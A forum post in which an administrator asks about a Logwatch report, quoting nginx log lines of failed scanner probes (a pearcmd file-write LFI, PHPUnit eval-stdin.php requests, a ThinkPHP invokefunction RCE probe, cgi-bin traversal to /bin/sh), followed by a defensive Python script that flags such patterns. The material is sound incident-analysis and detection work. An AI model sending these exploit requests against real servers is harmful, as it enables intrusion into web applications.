
Can anyone provide any advice on this Logwatch analysis?

Çağlar Arlı


I received this Logwatch report:

 Connection attempts using mod_proxy:
    xx.xx.xxx.xx -> codeforces.com:443: 1 Time(s)
 
 A total of 2 possible successful probes were detected (the following URLs
 contain strings that match one or more of a listing of strings that
 indicate a possible exploit):
 
    /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP Response 200 
    /index.php?lang=../../../../../../../../tmp/index1 HTTP Response 200 

I'm trying to understand what is going on, so I went through the following steps.

<?echo(md5(\x22hi\x22));?>

So, he potentially created this file '/tmp/index1.php', which contains the MD5 hash of the string 'hi'. Then he tries to access this file to verify whether its creation was successful.

The directory '/usr/local/lib/php/' doesn't exist, and there is no 'index1.php' file in the '/tmp' directory.

I took a look at '/var/log/nginx/access.log':

xxx.xxx.xx.xx - - [07/Aug/2024:00:03:59 +0000] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xx.xxx.xxx.xx - - [07/Aug/2024:05:39:10 +0000] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"

So, the server returns a 404 error.

I searched for more information about both IPs in the access.log and found the following for each IP:

sudo grep 'xxx.xxx.xx.xx' /var/log/nginx/access.log

xxx.xxx.xx.xx - - [07/Aug/2024:00:03:16 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 157 "-" "-"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:18 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 157 "-" "-"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:18 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:18 +0000] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:20 +0000] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:20 +0000] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:21 +0000] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:21 +0000] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:22 +0000] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:23 +0000] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:32 +0000] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:32 +0000] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:33 +0000] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:33 +0000] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:36 +0000] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:36 +0000] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:37 +0000] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:38 +0000] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:38 +0000] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:39 +0000] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:39 +0000] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:40 +0000] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:41 +0000] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:41 +0000] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:41 +0000] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:42 +0000] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:43 +0000] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:45 +0000] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:45 +0000] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:46 +0000] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:48 +0000] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:48 +0000] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:51 +0000] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:52 +0000] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:53 +0000] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:53 +0000] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:54 +0000] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:54 +0000] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:55 +0000] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:55 +0000] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:58 +0000] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:03:59 +0000] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
xxx.xxx.xx.xx - - [07/Aug/2024:00:04:00 +0000] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"

So, are they using a 'generic' script to check for vulnerabilities?

Any advice for a newbie would be appreciated. Thank you.
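A defender-side triage of log lines like the ones above, added here as an example and not part of the original post: it parses nginx combined-format entries, undoes nginx's \xHH escaping and the (double) URL-encoding before matching the probe patterns seen in this log (traversal, pearcmd config-create, phpunit eval-stdin.php), and reports per source IP whether any flagged request actually received a 2xx, which is the check that decides whether Logwatch's "HTTP Response 200" line needs escalation. The sample entries are constructed from the excerpt with documentation IPs, plus one invented 200 response so that branch is exercised.

```python
import re
from urllib.parse import unquote

# Constructed sample modelled on the access.log excerpt in the post: IPs replaced by
# documentation addresses, plus one invented 200 so the "probe succeeded" branch runs.
SAMPLE_LOG = r'''
192.0.2.10 - - [07/Aug/2024:00:03:18 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 157 "-" "-"
192.0.2.10 - - [07/Aug/2024:00:03:18 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
192.0.2.10 - - [07/Aug/2024:00:03:59 +0000] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
192.0.2.10 - - [07/Aug/2024:00:04:00 +0000] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 404 153 "-" "Custom-AsyncHttpClient"
198.51.100.7 - - [07/Aug/2024:05:39:10 +0000] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 32 "-" "Custom-AsyncHttpClient"
198.51.100.7 - - [07/Aug/2024:05:40:00 +0000] "GET /robots.txt HTTP/1.1" 200 68 "-" "Mozilla/5.0"
'''
# nginx "combined" format: ip ident user [time] "METHOD path PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

def unescape_nginx(s):
    """Undo nginx's \\xHH escaping of quotes, backslashes and control bytes (\\x22 -> ")."""
    return re.sub(r'\\x([0-9A-Fa-f]{2})', lambda m: chr(int(m.group(1), 16)), s)

def indicators(raw_path):
    # Two unquote passes so both '.%2e' and the double-encoded '%%32%65' become '..'
    decoded = unquote(unquote(unescape_nginx(raw_path)))
    tags = set()
    if '/../' in decoded or decoded.endswith('/..'):
        tags.add('path-traversal')
    if 'pearcmd' in decoded and 'config-create' in decoded:
        tags.add('pearcmd-config-create')       # PEAR config-create file write via LFI
    if 'eval-stdin.php' in decoded:
        tags.add('phpunit-eval-stdin')
    return tags

def triage(log_text):
    """Per source IP: probe count, indicator set, and flagged requests that got a 2xx."""
    report = {}
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = indicators(m['path'])
        if not tags:
            continue                            # ordinary traffic, not a probe
        e = report.setdefault(m['ip'], {'probes': 0, 'tags': set(), 'successful': []})
        e['probes'] += 1
        e['tags'] |= tags
        if m['status'][0] == '2':               # only these deserve escalation
            e['successful'].append((m['ts'], m['status'], m['path']))
    return report
```

Run it against the real file with `triage(open('/var/log/nginx/access.log').read())`; an IP whose `successful` list stays empty produced only failed probes, which is what the 404s in the excerpt above indicate.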